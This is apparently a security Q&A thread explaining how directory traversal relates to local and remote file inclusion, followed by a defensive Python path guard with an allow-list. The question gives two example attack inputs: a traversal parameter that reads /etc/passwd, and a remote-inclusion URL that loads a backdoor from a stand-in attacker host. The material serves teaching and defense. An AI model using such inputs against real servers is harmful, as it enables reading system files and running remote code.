Based on this previous question, it seems like the difference between directory traversal and file inclusion is as follows:

Directory traversal

  • Improper validation of user input leads to read access of server resource.
  • Example: http://www.example.com?file=../../etc/passwd

File inclusion

  • Improper validation of user input leads to the loading of an external resource into the server and execution therein.
  • Example: http://www.example.com/vuln_page.php?file=http://www.hacker.com/backdoor

This link, however, describes these concepts using the words local file inclusion and remote file inclusion.

So, is the first example

  • directory traversal vs. file inclusion

the same as the second example

  • local file inclusion vs. remote file inclusion

i.e. LFI/RFI is just different terminology for the same thing?

Zach Valenta

1 Answer

Your confusion stems from your over-broad understanding of directory traversal.

Traversal means one can read from another directory. Not specifically that one can read a file.

LFI is reading a local file, either in the current working directory or, using traversal, a file in another directory.

RFI is including a file from an external source.

It is possible to have an LFI vulnerability without there being a directory traversal vulnerability (files local to the current context). And, technically, it is possible that there can be a traversal vulnerability that does not result in an LFI.

schroeder
  • "LFI is reading a local file" vs. "RFI is including a file" --> the atomic distinction I was looking for; cheers – Zach Valenta Dec 05 '17 at 19:27
  • @ZachValenta I might amend your statement that "LFI is reading a local file" vs. "RFI is reading a remote file". "Including" is merely a technical implementation of "reading". – schroeder Dec 05 '17 at 21:37
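As an added illustration of the three cases in the answer above (example code, not from the question, the answer or any project), here is a small server-side guard that classifies a `file=` parameter as remote, traversal, or local before anything is included, and an allow-list resolver built on it. The base directory `/var/www/app/pages` and the page names in `ALLOWED_PAGES` are constructed assumptions.

```python
import os
import re

# Constructed example: the directory the application intends includes to come from.
BASE_DIR = "/var/www/app/pages"
# Constructed allow-list of pages the application actually means to include.
ALLOWED_PAGES = {"home.php", "about.php", "contact.php"}

# A leading URL scheme (http://, https://, ftp://, ...) means the value names an
# external resource rather than a path on this server.
_SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*://")


def classify_include(value: str, base_dir: str = BASE_DIR) -> str:
    """Say what blindly including `value` would do, using the answer's three cases.

    "remote"    - an external resource would be fetched (the RFI case)
    "traversal" - the path escapes base_dir into another directory
    "local"     - the path stays inside base_dir (a plain local include)
    Pure string logic: no file is opened, so it runs offline.
    """
    if _SCHEME.match(value):
        return "remote"
    base = os.path.normpath(base_dir)
    # os.path.join discards base when value is absolute, and normpath collapses
    # "." and "..", so anything that escapes base ends up outside it.
    resolved = os.path.normpath(os.path.join(base, value))
    if os.path.commonpath([base, resolved]) != base:
        return "traversal"
    return "local"


def safe_include_path(value: str, base_dir: str = BASE_DIR,
                      allowed: frozenset = frozenset(ALLOWED_PAGES)) -> str:
    """Return the absolute path to include, or raise ValueError.

    Rejects remote resources and traversal outright, then requires the resolved
    file to be one the application explicitly allows. Symlinks inside base_dir
    are not resolved here; on a real filesystem apply os.path.realpath as well.
    """
    kind = classify_include(value, base_dir)
    if kind != "local":
        raise ValueError(f"refused {kind} include: {value!r}")
    base = os.path.normpath(base_dir)
    resolved = os.path.normpath(os.path.join(base, value))
    if os.path.relpath(resolved, base) not in allowed:
        raise ValueError(f"file not on allow-list: {value!r}")
    return resolved
```

An absolute path such as `/etc/passwd` is reported as traversal because, in the answer's terms, it reads from another directory even though it contains no `..` segment.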